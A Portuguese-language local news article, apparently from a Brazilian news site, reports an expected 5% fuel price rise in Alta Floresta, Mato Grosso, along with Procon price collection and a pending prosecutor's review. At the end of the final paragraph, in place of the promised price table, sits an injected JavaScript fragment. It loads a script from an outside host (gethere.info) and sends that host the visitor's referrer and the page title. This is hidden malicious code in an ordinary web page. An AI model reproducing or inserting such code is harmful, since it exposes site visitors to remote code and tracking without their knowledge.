Capa / Cidades / Combustíveis devem sofrer reajuste de 5% hoje

Combustíveis devem sofrer reajuste de 5% hoje

Dionéia Martins

A partir de hoje, 1º de fevereiro, os motoristas devem sentir no bolso mais uma vez ao abastecer o carro. Publicada no dia 21 de janeiro, uma nova tabela de Preço Médio Ponderado ao Consumidor Final (PMPF), que serve de base de cálculo para arrecadação de Imposto Sobre Circulação de Mercadorias e Serviços (ICMS), começa  a valer.

Em Alta Floresta a expectativa é que a gasolina suba em torno de R$ 0,20 (vinte centavos), isso porque o combustível deve ter um ajuste de até 5%. Nos últimos 12 meses o preço (médio) da gasolina aumento 21% no município.

O combustível de Alta Floresta é um dos mais caros do Estado de Mato Grosso, e os sucessivos aumento chamou a atenção do Procon que tem coletado semanalmente o preço em todos os 12 postos de combustíveis do município e encaminhado para o Ministério Público.

O Ministério Público é deverá confrontar os preços praticados com os valores de compra dos produtos para saber se os estão praticado preços abusivos ou fora daquilo que está na decisão judicial da margem de lucro que é de até 20%.

A nossa reportagem tem procurado saber no Ministério Público se os preços em Alta Floresta estão ou não abusivos, mas ainda não conseguimos falar Promotor Luciano Martins, que é o responsável pela investigação.

ETANOL OU GASOLINA

Para calcular e saber qual combustível é mais vantajoso, basta dividir o valor do litro do etanol pelo da gasolina. Se o resultado for menor que 0,7, ainda vale a pena abastecer com etanol. Se for maior, a melhor opção é a gasolina.

Pesquisar ainda é a melhor solução para economizar. Hoje o preço nas bombas de combustível já deve está com aumento confira abaixo os preços semana passada e veja realmente houve reajuste. Os valores foram coletados pelo Procon.tabela combustivels.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top